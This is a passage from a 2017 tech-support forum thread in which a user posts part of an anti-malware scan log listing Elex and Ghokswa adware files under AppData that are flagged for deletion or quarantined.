    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\fr, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\en, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\sr, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\mr, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\el, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\de, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\da, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\cs, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\ca, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\bn, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\bg, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\ar, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\cast_setup, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\fil, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\CacheWritableAdobeRoot\AssetCache\PFH8WCS9, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\ca, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\bn, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\bg, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\ar, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\am, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\iw, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\lt, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\ko, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\ro, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\lv, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\ml, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\id, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\mr, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\nl, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\sw, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\ms, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\nb, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\pl, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\pt, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\kn, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\ja, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\hu, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_metadata, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\hr, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\ru, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\sk, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\sl, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\sr, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\sv, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\hi, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\ta, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\te, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\th, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\tr, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\uk, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\vi, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\zh, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\it, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\gu, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\fr, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\fi, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\fa, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\et, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\es, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\en, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\es_419, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\el, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\de, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\da, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\cs, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\zh_TW, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\zh_CN, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\en_GB, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pt_BR, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\cast_setup, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pt_PT, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\apifmdobolibbidmcdlofnnenabonodd\1.0.0.2_0\_locales\pt_BR, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Service Worker\CacheStorage\b1c1ce0d575020c49d5cfa4e146fef4c25e36f82, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\apifmdobolibbidmcdlofnnenabonodd\1.0.0.2_0\_locales\zh_TW, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\apifmdobolibbidmcdlofnnenabonodd\1.0.0.2_0\_locales\zh_CN, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_metadata, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\es_419, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fil, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales, Delete-on-Reboot, [15], [329198],1.0.1506
     
  17. 2017/03/19
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    Trophy Points:
    233
    Location:
    Singapore
    Computer Experience:
    Still Improving
    (Part 2)
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Thumbnails, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\GCM Store, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Sync Data, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\IndexedDB, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\EVWhitelist\7\_platform_specific, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\databases, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\WidevineCDM\1.4.8.903\_metadata, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Storage, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\pnacl\0.52.39.4554\_metadata, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\SwReporter\8.62.4\_metadata, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\CertificateTransparency\117, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\WidevineCDM\1.4.8.903\imgs, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\EVWhitelist\7\_metadata, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\CertificateTransparency, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\PepperFlash\22.0.0.209, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\WidevineCDM\1.4.8.903, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\pnacl\0.52.39.4554, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\Webstore Downloads, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\FileTypePolicies\4, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\SwReporter\8.62.4, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\Crashpad\reports, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\FileTypePolicies, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\EVWhitelist\7, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\OriginTrials, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\PepperFlash, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\ShaderCache, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\SwiftShader, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\EVWhitelist, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\WidevineCDM, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\SwReporter, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\Crashpad, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\Avatars, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\pnacl, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\Caps, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\USERS\USER\APPDATA\LOCAL\comapyreawecultetesp, Quarantined, [15], [329198],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\macromedia.com\support\flashplayer\sys\#spotxchange-a.akamaihd.net, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\macromedia.com\support\flashplayer\sys\#cdnk.stickyadstv.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\macromedia.com\support\flashplayer\sys\#cdn2.dashbida.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\macromedia.com\support\flashplayer\sys\#www.ajaxcdn.org, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT\macromedia.com\support\flashplayer\sys\#s.ytimg.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Service Worker\CacheStorage\b1c1ce0d575020c49d5cfa4e146fef4c25e36f82\fc38bb06-7f57-4e4e-8c8a-fb0bdc4a33e8\index-dir, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\015659d1-ea9b-439e-acf5-779362b9cead\index-dir, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#cdncache-a.akamaihd.net, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#www.tripadvisor.com.my, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#www.paypalobjects.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#static1-ssl.dmcdn.net, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#qsf.is.quoracdn.net, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#player.letvcdn.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#static1.dmcdn.net, Quarantined, [27], [325136],1.0.1506
